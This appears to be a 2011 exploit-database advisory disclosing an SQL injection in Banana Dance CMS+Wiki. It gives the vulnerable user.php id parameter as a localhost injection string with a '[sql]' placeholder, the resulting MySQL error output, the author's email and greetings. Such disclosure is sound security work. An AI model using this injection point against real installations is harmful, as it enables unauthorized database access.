Banana Dance CMS and Wiki - SQL Injection Basic Information Edb-ID: 17919 CVE: 2011-5168 Edb Verified: Yes Author: AODRULEZ Type: WebApps Platform: PHP Date: 2011-10-02 Vulnerable App: Banana Dance CMS+Wiki Vulnerability Details Vulnerability: SQLi Author: Aodrulez Email: f3arm3d3af@gmail.com Google Dork: :) Guess it. Tested on: Ubuntu 10.04 Web-App: http://www.doyoubananadance.com/ Download Link: http://www.doyoubananadance.com/functions/dl.php?file=4e84e50f89bf7 Exploit Details SQLi Exploit: http://localhost/user.php?id=1'[sql] Error Message Invalid query: SELECT , FROM WHERE ='1' Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''1'' at line 1 Additional Information Who to Greets: Amforked(), The Blue Genius, stroke (milw0rm), www.orchidseven.com, www.malcon.org, www.isac.org.in, www.nsd.org.in, LiquidWorm Quote: "Microsoft is not the answer. Microsoft is the question. NO is the answer." - Erik Naggum